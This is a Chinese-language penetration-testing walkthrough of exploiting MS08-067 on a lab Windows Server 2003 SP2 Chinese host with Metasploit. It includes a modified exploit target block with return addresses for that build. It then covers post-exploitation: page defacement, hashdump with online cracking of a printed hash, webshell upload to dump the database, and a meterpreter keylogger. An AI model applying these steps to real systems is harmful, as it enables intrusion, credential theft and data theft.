一、測試環境
攻擊機:kali(NMAP+MSF)
靶機:windows server 2003 SP2 中文版
利用漏洞:MS08_067
二、漏洞描述
MS08-067漏洞的全稱為“Windows Server服務RPC請求緩沖區溢出漏洞”,如果用戶在受影響的系統上收到特制的 RPC 請求,則該漏洞可能允許遠程執行代碼,可用於進行蠕蟲攻擊。受影響的系統有 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 。
三、目標滲透
1、Nmap信息收集,目標開放445端口,可能存在ms08_067漏洞。
嘗試使用MSF的攻擊模塊ms08_067_netapi.rb進行攻擊,試了幾遍之后沒成功。根據返回的信息知道目標是windows server 2003 中文版,然后切換到已下目錄:/usr/share/metasploit-framework/modules/exploits/windows/smb
找到ms08_067_netapi.rb文件,仔細看了一遍果然沒有關於中文版的攻擊代碼。
於是找度娘,最后借鑒了一位大佬的文章,對攻擊模塊稍作修改。
對原文件做備份:
在ms08_067_netapi_ser2003_zh.rb中增加以下代碼,其實就是修改了四個跳轉指針地址(舉一反三,其他系統。。。)。
['Windows 2003 SP2 Chinese (NX)',
{
'RetDec' => 0x7c99beb8, # dec ESI, ret @NTDLL.DLL (0x4EC3)
'RetPop' => 0x7cb5e84e, # push ESI, pop EBP, ret @SHELL32.DLL(0x565DC3)
'JmpESP' => 0x7c99a01b, # jmp ESP @NTDLL.DLL(0xFFE4)
'DisableNX' => 0x7c96f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
如圖所示:
通過search命令查找模塊並使用模塊
輸入info查看模塊的詳細信息,發現增加了第65行的內容。
先show options 然后設置目標IP以及payload
輸入exploit進行攻擊,發現無法識別語言。
於是設定target
好了,又出現新的問題,提示是之前的攻擊讓目標系統崩潰了。
嘗試重啟目標主機,執行相同操作,攻擊成功。
系統權限
嘗試echo一個簡單文件,掛個的黑頁
成功了
找到網站的數據庫,我這提供兩種思路進行脫褲。
輸入back回退到meterpreter界面。
1、切換到網站的跟目錄,直接echo或者upload一個木馬文件,然后通過瀏覽器連接進行脫褲。
2、輸入hashdump獲取目標主機的所有用戶密碼的哈希值,然后解密獲得明文,直接遠程登錄進行脫褲。
3、注:目標主機若未開啟3389端口請參照:https://www.cnblogs.com/panisme/p/8341970.html
copy這段hash值:32ed87bdb5fdc5e9cba88547376818d4到https://www.somd5.com/上解密,
得到administrator的密碼明文,如下圖所示:
當然meterpreter的功能遠不止這些,還有鍵盤記錄截屏等等。。。
以下是鍵盤記錄測試:
先ps查看目標主機正在運行的進程信息。
接着用migrate + PID 綁定相應的進程。
使用keyscan_start啟動鍵盤監聽,keyscan_dump打印獲取到的內容,最后輸入keyscan_stop來結束鍵盤監聽。
****************
四、參照:https://bbs.pediy.com/thread-186737.htm